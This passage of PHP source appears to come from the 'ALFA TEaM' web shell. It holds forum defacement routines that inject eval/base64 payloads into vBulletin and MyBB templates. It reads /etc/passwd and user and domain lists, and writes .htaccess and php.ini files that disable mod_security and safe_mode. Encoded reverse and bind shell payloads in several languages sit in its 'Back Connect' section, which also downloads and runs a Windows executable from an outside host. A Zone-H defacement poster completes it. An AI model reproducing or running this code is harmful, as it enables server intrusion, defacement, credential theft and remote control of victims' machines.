4470<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
4471<input type='submit' value=' '></form></center></center>";
4472if($_POST['alfa8']=='>>'){
4473$s0levisible="Powered By Solevisible";
4474$dbu = $_POST['alfa2'];
4475$dbn = $_POST['alfa3'];
4476$dbp = $_POST['alfa4'];
4477$dbh = $_POST['alfa5'];
4478$index = $_POST['alfa6'];
4479$prefix = $_POST['alfa7'];
4480$index=str_replace("\'","'",$index);
4481$set_index = "{\${eval(base64_decode(\'";
4482$set_index .= __ZW5jb2Rlcg("echo \"$index\";");
4483$set_index .= "\'))}}{\${exit()}}";
4484if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
4485$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
4486$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
4487$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
4488$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
4489@mysqli_query($conn,$loli1) or die (mysqli_error($conn));
4490@mysqli_query($conn,$loli2) or die (mysqli_error($conn));
4491@mysqli_query($conn,$loli3) or die (mysqli_error($conn));
4492__alert('VB index changed...!');
4493}
4494}
4495}
4496if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
4497echo __pre();
4498
4499echo "<center><center><div class='txtfont_header'>| Mybb |</div>
4500<p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
4501";
4502$table = array('td1' =>
4503 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
4504 'td2' =>
4505 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
4506 'td3' =>
4507 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
4508 'td4' =>
4509 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
4510);
4511create_table($table);
4512echo "<br><div class='txtfont'>| Your Index |</div><br>
4513<textarea name=mybbindex rows='19' cols='103'>
4514<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
4515if(isset($_POST['alfa6'])){
4516$mybb_dbh = $_POST['alfa6'];
4517$mybb_dbu = $_POST['alfa7'];
4518$mybb_dbn = $_POST['alfa8'];
4519$mybb_dbp = $_POST['alfa9'];
4520$mybb_index = $_POST['alfa10'];
4521if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
4522$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
4523$prefix="mybb_";
4524$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
4525$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
4526__alert('MyBB index changed...!');
4527}
4528}
4529}
4530echo "</div>";
4531alfafooter();
4532}
4533function alfaproc()
4534{
4535alfahead();
4536echo "<Div class=header><br><center>";
4537if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
4538$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
4539if($GLOBALS['sys']=="win"){
4540$process=array(
4541"Task List" =>"tasklist /V",
4542"System Info" =>"systeminfo",
4543"Active Connections" => "netstat -an",
4544"Running Services" => "net start",
4545"User Accounts" => "net user",
4546"Show Computers" => "net view",
4547"ARP Table" => "arp -a",
4548"IP Configuration" => "ipconfig /all"
4549);}else{
4550$process=array(
4551"Process status" => "ps aux",
4552"Syslog" =>"cat /etc/syslog.conf",
4553"Resolv" => "cat /etc/resolv.conf",
4554"Hosts" =>"cat /etc/hosts",
4555"Cpuinfo"=>"cat /proc/cpuinfo",
4556"Version"=>"cat /proc/version",
4557"Sbin"=>"ls -al /usr/sbin",
4558"Interrupts"=>"cat /proc/interrupts",
4559"lsattr"=>"lsattr -va",
4560"Uptime"=>"uptime",
4561"Fstab" =>"cat /etc/fstab"
4562);}
4563foreach($process as $n => $link){
4564echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
4565}
4566echo "</center><br>";
4567if(!empty($_POST['alfa1'])){
4568echo "<pre class='ml1' style='margin-top:5px' >";
4569if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
4570echo alfaEx($cmd.$_POST['alfa1'], true);
4571echo '</pre>';
4572}
4573echo "</div>";
4574alfafooter();
4575}
4576function alfasafe(){
4577alfahead();
4578echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
4579echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
4580if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
4581if(!_alfa_file_exists("/etc/virtual/domainowners")){
4582echo __pre();
4583$solevisible9 = _alfa_file('/etc/named.conf');
4584if(is_array($solevisible9)){
4585foreach($solevisible9 as $solevisible13){
4586if(@eregi('zone',$solevisible13)){
4587preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
4588if(strlen(trim($solevisible14[1][0])) > 2){
4589echo $solevisible14[1][0].'<br>';
4590}}}
4591}
4592}else{
4593echo __pre();
4594$users = _alfa_file("/etc/virtual/domainowners");
4595if(is_array($users)){
4596foreach($users as $boz){
4597$dom = explode(":",$boz);
4598echo $dom[0]."\n";}}}}
4599if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
4600echo '
4601<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
4602if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
4603if(!_alfa_file_exists("/etc/virtual/domainowners")){
4604$site = trim($_POST['alfa7']);
4605$rep = str_replace(array("https://","http://","www."),"",$site);
4606$user = "";
4607if(function_exists("posix_getpwuid") && function_exists("fileowner")){
4608 if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
4609 $user = $user['name'];
4610 }
4611}else{
4612 if(_alfa_can_runCommand(true,true)){
4613 $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
4614 }
4615}
4616if(!empty($user)&&$user!='root'){
4617echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
4618}else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
4619}else{
4620$site = trim($_POST['alfa7']);
4621$rep = str_replace(array("https://","http://","www."),"",$site);
4622$users = _alfa_file("/etc/virtual/domainowners");
4623foreach($users as $boz){
4624$ex = explode(":",$boz);
4625if($ex[0] == $rep){
4626echo __pre()."<center><table border='1'>
4627<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
4628<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
4629if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
4630if(!_alfa_file_exists("/etc/virtual/domainowners")){
4631echo __pre();
4632$i = 0;
4633while ($i < 60000) {
4634$line = @posix_getpwuid($i);
4635if (!empty($line)) {
4636while (list ($key, $vl) = each($line)){
4637echo $vl."\n";
4638break;}}$i++;}
4639}else{echo __pre();
4640$users = _alfa_file("/etc/virtual/domainowners");
4641foreach($users as $boz){
4642$user = explode(":",$boz);
4643echo trim($user[1]).'<br>';}}}
4644if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
4645echo __pre();
4646if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
4647for($uid=0;$uid<60000;$uid++){
4648$ara = @posix_getpwuid($uid);
4649if(!empty($ara)){
4650while(list ($key, $val) = each($ara)){
4651echo "$val:";
4652}echo "\n";}}
4653}else{__alert('failed...');}}
4654if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
4655@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
4656echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
4657}
4658if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
4659@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
4660echo '<center><b><big> php.ini created...!</center></b></big>';
4661}
4662if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
4663@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
4664echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
4665}
4666echo "<br></div>";
4667alfafooter();
4668}
4669function __get_resource($content){
4670return @gzinflate(__ZGVjb2Rlcg($content));
4671}
4672function __write_file($file, $content){
4673if($fh = @fopen($file, "wb")){
4674if(fwrite($fh, $content)!==false) return true;
4675}
4676return false;
4677}
4678function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
4679$res = "<font color='green'>[ Success...! ]</font>";
4680$err = "<font color='red'>[ Failed...! ]</font>";
4681if($evalOptions!="") $evalOptions = $evalOptions." ";
4682if($evalArguments!="") $evalArguments = " ".$evalArguments;
4683if($evalType=="c"){
4684$tmpdir = ALFA_TEMPDIR;
4685chdir($tmpdir);
4686if(is_writable($tmpdir)){
4687$uniq = substr(md5(time()),0,8);
4688$filename = $evalType.$uniq.".c";
4689$path = $filename;
4690if(__write_file($path, $evalCode)){
4691$ext = ($GLOBALS['sys']=='win')? ".exe":".out";
4692$pathres = $filename.$ext;
4693$evalOptions = "-o ".$pathres." ".$evalOptions;
4694$cmd = "gcc ".$evalOptions.$path;
4695alfaEx($cmd);
4696if(is_file($pathres)){
4697if(chmod($pathres, 0755)){
4698$cmd = $pathres.$evalArguments;
4699alfaEx($cmd);
4700}else{$res = $err;}
4701unlink($pathres);
4702}else{$res = $err;}
4703unlink($path);
4704}else{$res = $err;}
4705}
4706return $res;
4707}elseif($evalType=="java"){
4708$tmpdir = ALFA_TEMPDIR;
4709chdir($tmpdir);
4710if(is_writable($tmpdir)){
4711if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
4712$classname = trim($r[1]);
4713$filename = $classname;
4714}else{
4715$uniq = substr(md5(time()),0,8);
4716$filename = $evalType.$uniq;
4717$evalCode = "class ".$filename." { ".$evalCode . " } ";
4718}
4719$path = $filename.".java";
4720if(__write_file($path, $evalCode)){
4721$cmd = "javac ".$evalOptions.$path;
4722alfaEx($cmd);
4723$pathres = $filename.".class";
4724if(is_file($pathres)){
4725if(chmod($pathres, 0755)){
4726$cmd = "java ".$filename.$evalArguments;
4727alfaEx($cmd);
4728}else{$res = $err;}
4729unlink($pathres);
4730}else{$res = $err;}
4731unlink($path);
4732}else{$res = $err;}
4733}
4734return $res;
4735}
4736return false;
4737}
4738function alfaconnect(){
4739alfahead();
4740$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
4741$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
4742$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
4743$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
4744$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
4745$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
4746$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
4747echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
4748echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
4749<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
4750$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
4751foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
4752echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
4753if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
4754$lang = $_POST['alfa1'];
4755$ip = $_POST['alfa2'];
4756$port = $_POST['alfa3'];
4757$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
4758$tmpdir = ALFA_TEMPDIR;
4759$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
4760$allow = array('perl','ruby','python','node');
4761eval('$lan=$'.$lang.';');
4762if(in_array($lang,$allow)){
4763if(__write_file($name,__get_resource($lan))){
4764if(_alfa_can_runCommand(true,true)){
4765$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
4766$out = alfaEx("$lang $name $arg $os");
4767if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
4768echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
4769}
4770}else{
4771echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
4772}
4773}
4774if($lang=='java'||$lang=='c'){
4775$code = __get_resource($lan);
4776$out = nl2br(bcinit($lang, $code,'',''));
4777echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
4778}
4779if($lang=='bcwin'){
4780$alfa = new AlfaCURL();
4781$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
4782$tmpdir = ALFA_TEMPDIR;
4783$f = @fopen($tmpdir.'/bcwin.exe','w+');
4784@fwrite($f, $s);
4785@fclose($f);
4786$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
4787}
4788if($lang=='php'){
4789echo "<pre class=ml1 style='margin-top:5px'>";
4790$code = __get_resource($lan);
4791if($code!==false){
4792$code = "\$target = \"".$arg."\";\n".$code;
4793eval($code);
4794echo("<center><font color='green'>[ Finished...! ]</font></center>");
4795}
4796echo "</pre>";
4797}
4798}
4799echo "</div>";
4800alfafooter();
4801}
4802function alfazoneh(){
4803alfahead();
4804echo '<div class=header>';
4805if(!function_exists('curl_version')){
4806echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
4807}
4808$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
4809$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
4810echo '
4811<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
4812<form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
4813<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
4814<br>
4815<select id="text" name="hackmode" style="width:400px;">';
4816$x=1;
4817foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
4818echo '</select><br><select id="text" name="reason" style="width:200px;">';
4819$x=1;
4820foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
4821echo '</select><br>
4822<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
4823<p><input type="submit" value=" " name="go" /></p>
4824</form></center>';
4825if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
4826ob_start();
4827$hacker = $_POST['alfa1'];
4828$method = $_POST['alfa2'];
4829$neden = $_POST['alfa3'];
4830$site = $_POST['alfa4'];
4831if(empty($hacker)){
4832die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
4833}elseif($method == "------------------------------------SELECT-------------------------------------"){
4834die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
4835}elseif($neden == "------------------------------------SELECT-------------------------------------"){
4836die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
4837}elseif(empty($site)){
